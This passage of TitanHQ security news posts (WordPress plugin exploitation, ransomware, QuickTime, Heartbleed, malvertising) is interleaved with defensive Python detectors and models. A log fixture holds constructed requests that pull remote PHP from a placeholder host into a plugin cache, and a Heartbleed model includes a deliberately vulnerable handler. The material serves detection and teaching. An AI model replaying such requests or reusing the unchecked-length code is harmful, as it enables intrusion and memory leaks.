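Both the Bart campaign above (a .js file dressed up as an image) and this RAA campaign (a .js file dressed up as a document) rely on the recipient never seeing the real extension. The script below is an added example, not code from the TitanHQ article or from the PhishMe, Proofpoint or RAA research it draws on: a mail-gateway style triage step that inspects attachment names, including the members of a ZIP container, and flags script or executable extensions hiding behind a document or image name. The sample attachments are constructed in memory, and the extension lists are the author's choice of common Windows script hosts rather than anything the article specifies.

```python
"""Triage email attachments for script payloads posing as documents or images.

Added example, not code from the TitanHQ article or the researchers it cites
(PhishMe/Proofpoint on Bart, the RAA analysis). Both campaigns delivered a
.js file whose name suggested an image or document, sometimes inside a ZIP.
The attachments below are constructed in memory; the extension lists are the
author's choice of common Windows script hosts and are an assumption.
"""
import io
import zipfile

# Extensions that Windows hands to a script host or loader when double-clicked.
SCRIPT_EXTENSIONS = {"js", "jse", "wsf", "wsh", "vbs", "vbe", "hta", "ps1",
                     "cmd", "bat", "scr", "exe", "pif", "com", "jar"}
# Extensions the attacker wants the victim to *think* they are opening.
DECOY_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "doc", "docx", "xls",
                    "xlsx", "txt", "rtf"}


def classify_name(filename):
    """Return a reason string if a filename looks like a disguised script, else None."""
    parts = filename.lower().rsplit("/", 1)[-1].split(".")
    if len(parts) < 2:
        return None
    final = parts[-1]
    if final in SCRIPT_EXTENSIONS:
        if len(parts) >= 3 and parts[-2] in DECOY_EXTENSIONS:
            return f"double extension: .{parts[-2]} decoy hiding .{final}"
        return f"script/executable extension .{final}"
    # A Unicode right-to-left override makes 'gpj.js' display as 'sj.jpg'.
    if "\u202e" in filename:
        return "right-to-left override character in filename"
    return None


def triage_attachment(filename, data):
    """Inspect one attachment (and the members of a ZIP) and return findings."""
    findings = []
    reason = classify_name(filename)
    if reason:
        findings.append((filename, reason))
    if data[:2] == b"PK":  # ZIP local-file-header magic
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for member in zf.namelist():
                    inner = classify_name(member)
                    if inner:
                        findings.append((f"{filename}!{member}", inner))
        except zipfile.BadZipFile:
            findings.append((filename, "ZIP header present but archive unreadable"))
    return findings


def build_sample_attachments():
    """Constructed attachments: decoys modelled on the Bart and RAA lures."""
    archive = io.BytesIO()
    with zipfile.ZipFile(archive, "w") as zf:
        zf.writestr("photos/IMG_2016_0621.jpg.js", "// constructed, not a real dropper")
    return [
        ("invoice_0608.doc.js", b"var a = 1;"),      # RAA-style document decoy
        ("Photos.zip", archive.getvalue()),         # Bart-style zipped image decoy
        ("quarterly_report.pdf", b"%PDF-1.4 ..."),  # benign
        ("holiday.png", b"\x89PNG\r\n\x1a\n"),       # benign
    ]


def run_triage(attachments):
    """Return every (name, reason) pair across a list of (filename, bytes)."""
    results = []
    for name, data in attachments:
        results.extend(triage_attachment(name, data))
    return results


if __name__ == "__main__":
    for name, reason in run_triage(build_sample_attachments()):
        print(f"BLOCK {name}: {reason}")
```

The check looks at names only, which is deliberately cheap: it is the policy Windows itself applies when the user double-clicks, so a file that Windows would hand to the script host is blocked regardless of what its icon or the email body claims it is.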
by G Hunt |
June 8, 2016 |
Cybersecurity News, Internet Security News
A new WordPress plugin vulnerability was recently uncovered that is being actively exploited. The vulnerability affects the WP Mobile Detector plugin, which is used to determine whether a website is being viewed on a desktop or mobile device and then serves a compatible WordPress theme. The plugin was one of the first able to distinguish between a standard mobile phone and a smartphone, and as of the start of May it had been installed on more than 10,000 WordPress websites.
WP Mobile Detector WordPress Plugin Vulnerability Exploited to Install Porn Spam Doorways
The WordPress plugin vulnerability was detected by Plugin Vulnerabilities, which noticed an HTTP HEAD request for a file called /wp-mobile-detector/resize.php on a site where the plugin had not been installed. Researchers at Plugin Vulnerabilities concluded that the request was made by someone checking whether the plugin was present in order to exploit a vulnerability. After searching for reports of a known vulnerability and finding none, the researchers investigated further and discovered that the plugin had an arbitrary file upload vulnerability. The vulnerability is straightforward to exploit and can be used to upload malicious files to the plugin’s cache directory, host spam content, redirect users to malicious websites, or install malware. Since the plugin performed no validation of input from untrusted sources, an attacker could pass a src parameter pointing at a remote URL hosting PHP code, and the plugin would fetch that file and store it in its cache directory, from where it could be executed. Many of the infections uncovered so far have involved the installation of porn spam doorways. Sucuri reports that the vulnerability has been exploited since May 27. Following the discovery of the WP Mobile Detector flaw last week, the plugin was temporarily removed from the WordPress plugin directory. The developer of the WP Mobile Detector plugin has now fixed the vulnerability.
Any site owner that has the plugin installed should immediately update to version 3.6. However, simply updating to the latest version of the plugin will not remove malware if it has already been installed. If web shells have already been installed,...
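The tell that led to the discovery was a single HEAD request in a log, and the same logs show the follow-up upload attempt and any web shell later run from the cache directory. The script below is an added example, not code from the TitanHQ article, Plugin Vulnerabilities or Sucuri: it parses Apache combined-format access log lines and flags the three request shapes described above. The log lines, IP addresses and the attacker's file names are constructed for the example, and the full plugin path under /wp-content/plugins/ is assumed from WordPress's standard layout.

```python
"""Spot WP Mobile Detector resize.php probes and upload attempts in access logs.

Added example; not code from the TitanHQ article, Plugin Vulnerabilities or
Sucuri. The log lines are constructed in Apache combined format. The request
shape (HEAD probe for resize.php, then a GET whose src parameter points at an
attacker-hosted file, then a hit on the cached PHP) follows the article's
description; the parameter values, file names and IPs are invented.
"""
import re
from urllib.parse import urlsplit, parse_qs

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

SAMPLE_LOG = """\
203.0.113.9 - - [30/May/2016:09:14:02 +0000] "HEAD /wp-content/plugins/wp-mobile-detector/resize.php HTTP/1.1" 404 -
203.0.113.9 - - [30/May/2016:09:14:03 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://198.51.100.7/x.php HTTP/1.1" 200 512
198.51.100.20 - - [30/May/2016:09:15:10 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=/wp-content/uploads/2016/05/logo.png&w=320 HTTP/1.1" 200 9832
192.0.2.5 - - [30/May/2016:09:16:44 +0000] "GET /index.php HTTP/1.1" 200 20311
192.0.2.8 - - [30/May/2016:09:17:01 +0000] "GET /wp-content/plugins/wp-mobile-detector/cache/x.php HTTP/1.1" 200 77
"""


def classify_request(method, target):
    """Return a finding label for one request, or None if it looks benign."""
    url = urlsplit(target)
    if not url.path.endswith("/wp-mobile-detector/resize.php"):
        if "/wp-mobile-detector/cache/" in url.path and url.path.endswith(".php"):
            return "PHP executed from plugin cache directory (possible web shell)"
        return None
    if method == "HEAD":
        return "HEAD probe for resize.php (plugin presence check)"
    src = parse_qs(url.query).get("src", [""])[0]
    if src.lower().startswith(("http://", "https://", "ftp://", "//")):
        return f"remote src fetched into cache: {src}"
    if ".php" in src.lower():
        return f"src names a PHP file: {src}"
    return None  # a local image resize, which is what the plugin is for


def scan_log(text):
    """Parse each line and return [(ip, status, label)] for suspicious requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify_request(m["method"], m["target"])
        if label:
            findings.append((m["ip"], m["status"], label))
    return findings


if __name__ == "__main__":
    for ip, status, label in scan_log(SAMPLE_LOG):
        print(f"{ip} [{status}] {label}")
```

Note that the probe in the first line returned 404: the site did not have the plugin, which is exactly the situation Plugin Vulnerabilities observed. A 200 on the same HEAD request is the sign that a vulnerable install is exposed and the next line in the log deserves a close look.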
by G Hunt |
May 26, 2016 |
Cybersecurity News, Internet Security News
Surprisingly, after ESET sent a request for the TeslaCrypt ransomware master key to the criminal gang behind the attacks, the gang responded by making the key public and even issued an apology. The surprise move signals the end of a ransomware family that was used primarily to target gamers.
TeslaCrypt Ransomware Master Key Released
So does the release of the TeslaCrypt ransomware master key mean that the attacks will now stop? The answer is a little complicated. Attacks using TeslaCrypt will slow and stop soon, and even if some individuals have their files locked by the ransomware in the meantime, they will not need to pay a ransom. Once the master key was made public, security companies started work on decryption tools to unlock infections. ESET has added the key to its TeslaCrypt decryption tool, and Kaspersky Lab similarly used the master key to update the decryption tool it had been using to unlock earlier versions of the ransomware. That does not mean that the criminal gang behind the campaign will stop its malicious activity; it just means the gang will stop using TeslaCrypt. There are many other types of ransomware that can be used for attacks. In fact, it would appear that TeslaCrypt has simply been replaced with a new form of ransomware called CryptXXX. According to ESET, many of the distributors of TeslaCrypt have already switched to CryptXXX. Under normal circumstances, contacting a criminal gang and asking for the master key would not have worked. Attackers running profitable ransomware campaigns are unlikely to respond to a polite request to unlock an infection without payment, let alone supply a master key that can be used to unlock all infections. The reason for the release is that TeslaCrypt was already being phased out.
ESET researcher Igor Kabina noticed that TeslaCrypt infections were slowing, which signaled that either the gang behind the ransomware was phasing it out in favor of a new malware, or that a new and updated version of TeslaCrypt would soon be released. Kabina decided to contact the attackers through the channels set up to allow victims to contact the gang and...
by G Hunt |
May 20, 2016 |
Cybersecurity News, Internet Security News
A new study has recently been published showing the impact of security breaches on brand image, and how consumer behavior changes when companies experience data breaches that expose private data. Cyberattacks are now taking place with such frequency that data breaches are to be expected. It is no longer a case of whether a security breach will occur, only when. Even with the best protections in place, breaches will still occur. Many consumers are aware that current threat levels are greater than ever and that cyberattacks will occur. But how do consumers react to breaches of their personal information? Do they forgive and forget, or do they take their business elsewhere?
What is the Impact of Security Breaches on Brand Image?
The FireEye study set out to examine the impact of security breaches on brand image. 2,000 interviews were conducted with consumers in the United States to find out whether security incidents changed behavior and whether data breaches altered perceptions of companies and trust in brands. The results clearly show that failure to invest in robust cybersecurity defenses can have a major impact on revenue. 76% of surveyed consumers said they would take their business elsewhere if they believed a company’s data handling practices were poor or that the company had been negligent with regard to data security. 75% of respondents said they would likely stop making purchases from a company if they felt a security incident resulted from the company’s failure to prioritize cybersecurity. Loss of business is not the only problem companies face following a data breach. If a breach of personal information occurs and the data are used by criminals for identity theft or fraud, 59% of consumers would take legal action to recover their losses.
Even when companies take action to mitigate the risk of losses being suffered by consumers – such as providing identity theft protection services – brand image remains tarnished. Reputation damage after a data breach is suffered regardless of the actions taken by companies to mitigate risk. It can also take...
by G Hunt |
April 28, 2016 |
Cybersecurity Advice, Internet Security News
Organizations are investing in technology to ensure that perimeter defenses are not breached; however, it is also important to address the risk of insider data breaches. According to a recent report from Forrester, internal incidents were responsible for more than half of the data breaches suffered by firms. Cybercriminals have stepped up their efforts and are attacking organizations with increased vigor, but the report suggests more than half of data breaches are caused by employee errors, oversights, and negligence. Employees are under increasing pressure to get more work completed in less time, which can easily lead to errors being made or shortcuts being taken. Employees may be security-minded most of the time, but it is all too easy for sloppy data security practices to creep in. Even with the most robust perimeter defenses in place, simple mistakes can lead to disaster.
Email-Borne Attacks Are Still a Major Risk
During the past 12 months the volume of spam email has fallen considerably. This is partly due to law enforcement taking down major botnets and the increasing use of efficient spam filters. Even at the reduced volume, the threat from spam email is considerable. The Forrester report indicates spam fell from almost 89% of all email in 2014 to 68% in 2015. However, over 91% of spam emails contain a malicious link and 2.34% carry malicious attachments. Cybersecurity awareness training has helped to mitigate the risk of insider breaches to some degree, but they are still occurring. Most employees now know not to open email attachments from people they do not know, but what about attachments from people they do know? There has been an increase in business email compromise attacks in recent months. These attacks involve spam and phishing emails that appear to come from within an organization, often sent from a compromised internal account. Such emails are far more likely to result in malicious attachments being opened and links being clicked than emails from strangers.
All emails should be treated as suspicious and should be carefully checked, not only those from outside an organization. Employees are aware never to run an executable file that has been sent via email...
by G Hunt |
April 15, 2016 |
Cybersecurity Advice, Internet Security News
Two new vulnerabilities in QuickTime for Windows have recently been discovered, but a patch to address the flaws will not be issued by Apple. Apple has taken the decision to deprecate QuickTime for Windows and has advised all Windows users to uninstall the software to prevent the vulnerabilities from being exploited. Apple intends to keep supporting the OS X version. The latest vulnerabilities in QuickTime for Windows (tracked as ZDI-16-241 and ZDI-16-242) are both heap corruption remote code execution vulnerabilities: each allows an attacker to write data outside an allocated heap buffer. The vulnerabilities could be exploited remotely, although user interaction is required. To exploit them, an attacker would need the target to open a malicious file or visit a malicious website. One of the vulnerabilities affects the handling of the moov atom (ZDI-16-241) while the other (ZDI-16-242) involves a flaw in atom processing more generally. In both cases an invalid index supplied in the file is used without validation, allowing data to be written outside the allocated heap buffer and code to be executed in the context of the QuickTime player process.
Latest Vulnerabilities in QuickTime for Windows Require Uninstallation of the Software
The discovery of the new vulnerabilities spells the end of the software for Windows users. Apple, Trend Micro, and US-CERT have all advised Windows users to uninstall QuickTime as soon as possible in order to stay protected. These two vulnerabilities are unlikely to be the last to be discovered, and leaving the software installed will place users at risk of attack. Exploits for the new vulnerabilities are not believed to have been developed yet, and no active attacks are known to have been conducted, but it is only a matter of time before they are added to exploit kits. Whenever a software developer takes the decision to stop supporting software, users must find alternatives.
IT departments should ensure that all Windows machines have QuickTime uninstalled as soon as possible. Apple has decided to stop support for QuickTime for Windows as most media programs no longer use QuickTime to play common formats, while HTML...
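Both advisories come down to the same discipline being skipped: a size or index read from the file was trusted before it was checked against the buffer actually allocated. The parser below is an added example, not Apple's code, ZDI's proof of concept or anything from the TitanHQ article. It walks the atom tree of a QuickTime/MP4 file (4-byte big-endian size, 4-byte type, optional 64-bit extended size) and refuses to descend into any atom whose declared size does not fit in the bytes that remain, which is the check that makes an oversized moov child harmless. The two sample files are constructed in memory and are not real movies.

```python
"""Bounds-checked walk of QuickTime/MP4 atoms.

Added example, not code from Apple, ZDI, Trend Micro or the TitanHQ article.
The two ZDI advisories describe heap corruption in atom processing when an
attacker-supplied index is not checked against the allocated buffer; this
parser shows the opposite discipline: every atom size is validated against
the bytes actually present before anything is read. The two sample files are
constructed in memory and are not real QuickTime movies.
"""
import struct

# Atoms whose payload is itself a sequence of atoms (subset of the spec).
CONTAINER_ATOMS = {b"moov", b"trak", b"mdia", b"minf", b"stbl", b"udta"}


def walk_atoms(buf, start=0, end=None, depth=0, path=""):
    """Yield (depth, path, size) for each atom; raise ValueError on malformed input."""
    end = len(buf) if end is None else end
    pos = start
    while pos < end:
        if end - pos < 8:
            raise ValueError(f"truncated atom header at offset {pos}")
        size, kind = struct.unpack(">I4s", buf[pos:pos + 8])
        header = 8
        if size == 1:  # 64-bit extended size follows the type field
            if end - pos < 16:
                raise ValueError(f"truncated extended size at offset {pos}")
            (size,) = struct.unpack(">Q", buf[pos + 8:pos + 16])
            header = 16
        elif size == 0:  # atom runs to the end of the enclosing container
            size = end - pos
        if size < header:
            raise ValueError(f"atom {kind!r} at {pos} declares size {size} < header")
        if pos + size > end:
            raise ValueError(
                f"atom {kind!r} at {pos} declares {size} bytes but only {end - pos} remain")
        name = f"{path}/{kind.decode('latin-1')}"
        yield depth, name, size
        if kind in CONTAINER_ATOMS:
            yield from walk_atoms(buf, pos + header, pos + size, depth + 1, name)
        pos += size


def atom(kind, payload=b""):
    """Build one atom with a 32-bit size field (helper for the sample files)."""
    return struct.pack(">I4s", 8 + len(payload), kind) + payload


def build_good_file():
    """A minimal, well-formed ftyp + moov(mvhd, trak(tkhd)) layout (constructed)."""
    return (atom(b"ftyp", b"qt  " + b"\x00" * 4 + b"qt  ")
            + atom(b"moov", atom(b"mvhd", b"\x00" * 100)
                   + atom(b"trak", atom(b"tkhd", b"\x00" * 84))))


def build_bad_file():
    """Same layout, but the inner 'mvhd' claims 0x7fffffff bytes (constructed)."""
    bogus_mvhd = struct.pack(">I4s", 0x7FFFFFFF, b"mvhd") + b"\x00" * 100
    return atom(b"ftyp", b"qt  ") + atom(b"moov", bogus_mvhd)


def parse(buf):
    """Return the list of atom paths, or raise ValueError; never reads out of bounds."""
    return [name for _, name, _ in walk_atoms(buf)]


def is_rejected(buf):
    """True if the parser refuses the file rather than trusting its size fields."""
    try:
        parse(buf)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(parse(build_good_file()))
    print("bad file rejected:", is_rejected(build_bad_file()))
```

The bad file is accepted at the top level (its moov atom is sized correctly) and only fails one level down, which is why the bound has to be re-applied against the enclosing container at every depth and not just against the file length.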
by G Hunt |
March 19, 2016 |
Cybersecurity News, Internet Security News
Cybercriminals are moving away from email attacks and concentrating on web-based exploits to deliver malware. Email remains a major source of malware, but web-based attacks are now much more prevalent.
Web-Based Exploits Increasingly Used to Deliver Malware
A recent report from Palo Alto Networks showed that out of just over 68,000 malware samples collected, 25% were delivered via email, whereas 68% were delivered during web browsing. Those figures are for known malware. For undetected samples, the figure for web browsing rose to 90%, compared to just 2% delivered via email. Undetected malware samples are those not detected by traditional anti-malware and anti-virus solutions. It is easy to see why web-based exploits are favored by cybercriminals. It takes much longer for web-based exploits to be detected by anti-virus software than email-based attacks; Palo Alto reports that it takes four times as long. Attackers are also able to tweak web-based malware in real time, whereas email-based malware has to be sent out in bulk and can only be changed for each new campaign. Email-borne malware is therefore relatively easy for AV companies to detect: they can capture a sample, give it a signature, and block subsequent copies. With web-based malware this is a much harder task. The malware can be altered for each visitor, making it harder for AV companies to capture a sample and create a signature. A web server hosting malware can be configured to re-encode the payload automatically and generate many thousands of unique samples, and capturing and writing a signature for each one takes too long. There are many methods that can be employed to reduce the risk of malware infections from web browsing, although one of the easiest preventative steps is to use a web filtering solution such as WebTitan.
WebTitan allows organizations to carefully control the websites that can be accessed by end users. Palo Alto reported that HTTP proxies were frequently used in malware delivery. The blocking of HTTP proxies and web anonymizers...
by G Hunt |
March 18, 2016 |
Cybersecurity News, Internet Security News
A recent study conducted by the Ponemon Institute on behalf of IBM investigated web application security visibility. The report revealed that for the majority of organizations there is none. When it comes to application security, many companies are in the dark: they either do not test the apps they use, or do not address the vulnerabilities they discover when they do. 640 application development and security professionals were asked about application security and the steps being taken to secure apps. The study also aimed to answer the question: how much do organizations know about the security of the applications they use on a day-to-day basis? The results are worrying. More than a third of companies (35%) perform no application security testing and are consequently unaware of whether the apps they use have security vulnerabilities. Worse still, 69% of respondents said they were not aware of all of the apps and databases in use in their organization.
Application Security Visibility Needs to be Improved
The study also revealed that more than two thirds (67%) of organizations do not have overall visibility into the state of application security in their companies. Of the organizations that do perform application security testing, more than half do not take steps to address the vulnerabilities they discover. 34% of respondents said urgent security vulnerabilities are not being fixed and 43% said web application security was not a priority in their organization. When asked why thorough testing of applications does not take place, 56% of respondents cited time constraints and organizational pressure to release applications quickly. 55% said their organization’s developers are too busy to work on application security issues, and 70% said they believed their organization invested too little in securing web applications and allocated insufficient resources to the task.
Developers do not feel that it is their job to ensure applications are secure, and that this task should be conducted by information security professionals employed by their organizations. Another issue is web...
by G Hunt |
March 12, 2016 |
Internet Security News, Network Security
Effective enterprise patch management policies can greatly improve security posture and prevent cyberattacks; however, many enterprise IT staff are confused about patch management. A new survey conducted by Tripwire suggests that InfoSec staff often confuse patch management with vulnerability mitigation. The complexity of enterprise patch management also leaves many security professionals unsure about when patches should be applied and what the impact of applying them will be.
The Complexity of Enterprise Patch Management Causes Problems for Many IT Security Professionals
The Tripwire survey questioned 480 IT security professionals about enterprise patch management policies at their organizations. The results show that IT staff are struggling to keep all systems in a fully patched state. 67% of respondents said that at least some of the time they are unsure which patches need to be applied to which systems. The complexity of enterprise patch management is a problem. For instance, a patch may be issued to address Adobe Flash vulnerabilities but arrive bundled with a Google Chrome update. It fixes the Flash vulnerabilities in Chrome, where Flash is embedded, but does not address standalone installations of Flash or the same vulnerabilities in other browsers. 86% of respondents said that issues such as this make it difficult to understand the impact of a patch. It is all too easy for security vulnerabilities to remain after a patch has been applied: patches are released that address multiple security vulnerabilities, but they do not necessarily address those vulnerabilities across all affected systems, so applying a patch will not always remediate a vulnerability entirely. According to Tripwire, “The relationship between patches and vulnerabilities is far more complex than most people think.” There is also considerable confusion between patches and software upgrades.
When it comes to addressing security vulnerabilities, a patch may address some, an upgrade may address others, and there is often some overlap. Because of this, organizations struggle to ensure that all software is properly patched and fully up to...
by G Hunt |
November 23, 2015 |
Internet Security News
Are you prepared for the official start of the Christmas shopping season? Will you be starting your Christmas shopping on Black Friday? If you can’t resist a bargain and can’t wait until Cyber Monday, take care! There are many fake Black Friday deals being advertised and you may end up becoming the victim of an online scam.
Fake Black Friday deals aplenty
Black Friday follows Thanksgiving Day in the United States, and it officially marks the first day of the Christmas shopping season. It is also a day when online criminals try to take advantage of Christmas shoppers. There will be plenty of genuine bargains, as Black Friday discounts are offered by most major retailers. Unfortunately for shoppers, there are also plenty of fake Black Friday deals being advertised online. Picking out the real deals from the fake ones is not as easy as it used to be. Scammers are getting good at creating highly realistic offers and fake websites. Furthermore, scammers have launched fake Android apps, and are now sending texts containing phishing links and fake phone lines.
Fake Amazon app will steal your passwords, make calls, and send texts
One of the scams already circulating offers a golden opportunity: the chance to beat the online crowds and grab a bargain before everyone else. Download this app, the pitch goes, and you will get to the front of the virtual queue and see all the Amazon Black Friday deals days early. Rather than launching an Amazon app when started, the fake Amazon app launches a component called com.android.engine. If you grant the permissions it requests, as many people who download the app will, you give it permission to view virtually everything on your phone, make calls, send texts, and see the data you enter via your phone. Deleting the app will make no difference. To avoid this scam and others like it, only download apps from the Google Play store, never from third-party sites.
Beware of texts warning of suspicious account activity Scammers may love email to deliver phishing links and malware-ridden attachments via email, but some are now resorting to text messages. Texts are sent warning of a security breach, account hack, or other need to call a...
by G Hunt |
April 15, 2014 |
Internet Security News
The Heartbleed security vulnerability was announced recently and had IT security professionals rapidly taking action to plug security holes. System passwords were changed and alerts were sent to end users telling them to do the same. Heartbleed is a highly serious data security vulnerability that was discovered in the OpenSSL cryptographic software library. It is so called because it affects the TLS extension commonly known as Heartbeat. Over half a million websites are believed to have been affected by the Heartbleed vulnerability. Much of the Internet is secured with SSL/TLS encryption, which allows information to be exchanged securely by a wide range of applications, including Instant Messaging (IM) services, email, and even Virtual Private Networks (VPNs). Unfortunately, the Heartbleed bug allows anyone who can connect to a vulnerable server to read chunks of its memory, which may include passwords and other sensitive data, even with SSL/TLS encryption in place. According to American cryptographer Bruce Schneier, Heartbleed is a potentially catastrophic security vulnerability. He recently said, “On the scale of one to 10, this is an 11.”
IT departments have been frantically issuing alerts to change passwords
Sensitive data is protected by passwords; however, Heartbleed has potentially allowed passwords to be compromised. The security vulnerability may have only just been discovered, but it has existed for at least two years. Hackers are not known to have used the vulnerability to gain access to sensitive data, but exploitation leaves no trace in normal server logs, so it is difficult to tell whether they have. As a precaution, IT staff have been sending emails to all users advising them to change their passwords. Unfortunately, they are not the only ones sending password change requests to users. Online scammers have been piggybacking on the major security event and sending emails of their own, conveniently also including links to allow users to rapidly address the huge security hole.
Any individual who has heard about the security issue will be keen to protect themselves against hackers and cyber criminals. Emails telling them to change their passwords are likely to be clicked. Unfortunately, clicking those links will take users to a...
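The bug itself is small enough to show side by side with its fix. The model below is an added example, not OpenSSL's code and not from the TitanHQ article: it recreates the heartbeat handler in plain Python over a bytearray standing in for process memory, with a heartbeat record followed by other data (a constructed password string, where a real heap might hold session keys or other users' requests). The vulnerable handler trusts the 16-bit payload length carried in the record; the fixed handler applies the bound the OpenSSL 1.0.1g patch added, discarding any record whose declared payload plus padding does not fit in the record that actually arrived.

```python
"""The Heartbleed bug as a model: an unchecked heartbeat length beside the fix.

Added example, not OpenSSL's code and not from the TitanHQ article. It models
the TLS heartbeat handler in plain Python over a bytearray standing in for
process memory: the heartbeat record sits in the buffer, and other data
(here a constructed password string) lies right after it, as it could in a
real heap. The vulnerable handler trusts the 16-bit payload length in the
record; the fixed handler applies the same bound the OpenSSL patch added.
Python slicing stops at the end of the bytearray, where C's memcpy would keep
reading adjacent heap; the leak is the same in kind, just shorter here.
"""
import struct

HB_REQUEST, HB_RESPONSE = 1, 2
PADDING = 16  # minimum random padding an RFC 6520 heartbeat carries


def build_heartbeat(payload, claimed_length=None):
    """Encode a heartbeat request; claimed_length lets a client lie about the size."""
    length = len(payload) if claimed_length is None else claimed_length
    return struct.pack(">BH", HB_REQUEST, length) + payload + b"\x00" * PADDING


def vulnerable_handler(memory, record_length):
    """Pre-patch behaviour: copy payload_length bytes from wherever the record points."""
    hbtype, payload_length = struct.unpack(">BH", memory[:3])
    if hbtype != HB_REQUEST:
        return None
    # No comparison against record_length: the copy can run past the record.
    payload = bytes(memory[3:3 + payload_length])
    return struct.pack(">BH", HB_RESPONSE, payload_length) + payload


def fixed_handler(memory, record_length):
    """Post-patch behaviour: drop the record if the claimed payload cannot fit."""
    if record_length < 1 + 2 + PADDING:
        return None  # silently discard, as the patch does for short records
    hbtype, payload_length = struct.unpack(">BH", memory[:3])
    if hbtype != HB_REQUEST:
        return None
    if 1 + 2 + payload_length + PADDING > record_length:
        return None  # the bound OpenSSL 1.0.1g added
    payload = bytes(memory[3:3 + payload_length])
    return struct.pack(">BH", HB_RESPONSE, payload_length) + payload


def simulate(claimed_length):
    """Lay a heartbeat record next to a constructed secret and run both handlers."""
    secret = b"user=alice&password=Tr0ub4dor&3;sessionid=9f1c..."  # constructed
    record = build_heartbeat(b"hi", claimed_length=claimed_length)
    memory = bytearray(record + secret)
    return (vulnerable_handler(memory, len(record)),
            fixed_handler(memory, len(record)))


def leaks_secret(response):
    """True if a heartbeat response carried bytes from outside the record."""
    return response is not None and b"password=" in response


if __name__ == "__main__":
    honest, lying = simulate(None), simulate(2000)
    print("honest request, both handlers echo:", honest[0][3:], honest[1][3:])
    print("lying request leaks via vulnerable handler:", leaks_secret(lying[0]))
    print("lying request dropped by fixed handler:", lying[1])
```

Two things the model makes visible that the headlines did not: an honest client gets an identical answer from both handlers, so the fix costs nothing, and the malicious request is not malformed TLS at all, which is why nothing in the handshake, the certificate or the server's logs flags it.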
by G Hunt |
March 4, 2014 |
Internet Security News
Web visitors can be ultra-cautious and avoid the kinds of websites that commonly host malware. Stay away from pornographic, gaming, betting, file-sharing, and streaming websites and you will reduce the risk of encountering malware. However, that does not mean you will never come across phishing websites and malware-ridden webpages. Even very large, reputable websites are sometimes compromised. How large? How about Yahoo, one of the biggest search engines and webmail providers on the Internet. Recently Yahoo was found to be serving adverts that attempted to install malware on users’ computers. The ad code examined each visitor’s computer and checked whether the latest Java version was installed. Earlier versions of Java contained vulnerabilities that could be exploited; the latest version fixed those security holes, but many users had not yet installed it. It is estimated that as many as 2 million people visited Yahoo and had their computers infected, and a great many more would have been compromised had they used Yahoo rather than Google. In this case, the individuals behind the infections – malvertisers – were putting users’ computers to work mining Bitcoin: a very profitable business if you have 2 million or more computers at your disposal. Of course this is nothing new. Many websites are infected with malware; they are just usually not as big as Yahoo. However, hackers are getting bolder and are now succeeding in infecting large websites with very good security measures in place.
Advertising networks are increasingly being infiltrated by malvertisers
Legitimate advertisers use advertising networks to syndicate their adverts across many thousands of websites, putting them in front of tens of millions of potential purchasers. Malvertisers, whether individuals or disreputable companies, are now doing the same.
They make their adverts look respectable and get them accepted by an advertising network. However, their ads contain links to malware-ridden websites, or code that probes for security vulnerabilities in users' computers. They then inject their malware and...
by G Hunt |
January 8, 2014 |
Internet Security News
Certain types of websites are known to host malware and carry a high risk of infecting visitors: video streaming sites, sites providing adult content, and sites run by individuals who lack an understanding of basic security controls. Those are not the only sites that can infect visitors with malware, however. Even the largest sites, Yahoo and YouTube among them, have served malware. How can websites that generate huge revenues, and can afford good security, also be infected? The problem is not the websites themselves but the content displayed on them. Malware is delivered indirectly, via the ad networks that site owners sign up to or fail to block. There are a lot of unscrupulous ad networks out there, and many do not vet their customers very well. Some allow anyone to sign up and serve just about any kind of advert, including ones that carry malware or malicious links. Any visitor to a site running those adverts could have their device infected, and if one of those visitors is an employee of yours, your network could be in serious trouble.

Ad networks can allow malware to be delivered to users' devices

An advert on a website can direct the visitor to a phishing website or to one hosting multiple pieces of malware. That is not to say that the advertisers are deliberately phishing for information or want to infect visitors; they may not even be aware that their own websites have been hijacked by hackers. Advertising is often a necessary evil for making websites profitable, and without advertisers many would simply go out of business. To generate revenue, site owners place code on their pages that loads content from third-party servers, which then show visitors text, image, or even video adverts. Those third-party servers can syndicate adverts to tens of thousands of websites, including many legitimate and well-known ones.
With the potential to send adverts to so many websites, ad networks are frequently targeted by cybercriminals. If they are successful, their malware can be very quickly syndicated and placed in front of tens or hundreds of thousands of individuals. In some cases,...
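The indirect delivery path described in the two items above (a site owner pastes a network's tag into a page, and whatever that network serves runs in every visitor's browser) can be made visible with a small audit. The following is an added example, not code from the original articles or from any ad network or filtering product: a Python script that parses a page's HTML, lists the origins that supply script and frame content, flags any that were never approved, and builds a Content-Security-Policy header that confines script and frame sources to the approved ones. The sample page, the hostnames (www.example.com, ads.example-network.net, cdn.example-cdn.com, tracker.example-analytics.org) and the approved list are constructed for the example.

```python
"""Inventory the third-party code a page lets into visitors' browsers.

Added example, not code from the original article. Pasting an ad network's
tag into a page hands that network's servers the right to run script in every
visitor's browser. This parses a page's HTML, lists the origins that supply
<script src> and <iframe src> content, flags the ones not on the owner's
approved list, and builds a Content-Security-Policy header restricting script
and frame sources to the approved origins. Hostnames and the sample page are
constructed for the example.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _SrcCollector(HTMLParser):
    """Collect src attributes of <script> and <iframe> tags; count inline scripts."""

    def __init__(self):
        super().__init__()
        self.scripts, self.frames, self.inline = [], [], 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            if a.get("src"):
                self.scripts.append(a["src"])
            else:
                self.inline += 1        # inline script: not attributable to an origin
        elif tag == "iframe" and a.get("src"):
            self.frames.append(a["src"])


def origin_of(url, page_origin):
    """Map a src URL to scheme://host. Relative paths resolve to the page's own
    origin; protocol-relative (//host/...) URLs inherit the page's scheme."""
    scheme = page_origin.split("://", 1)[0]
    if url.startswith("//"):
        url = scheme + ":" + url
    parts = urlsplit(url)
    if not parts.netloc:
        return page_origin
    return f"{parts.scheme or scheme}://{parts.netloc.lower()}"


def inventory(html, page_origin):
    """Return the distinct script and frame origins on the page plus the count
    of inline <script> blocks."""
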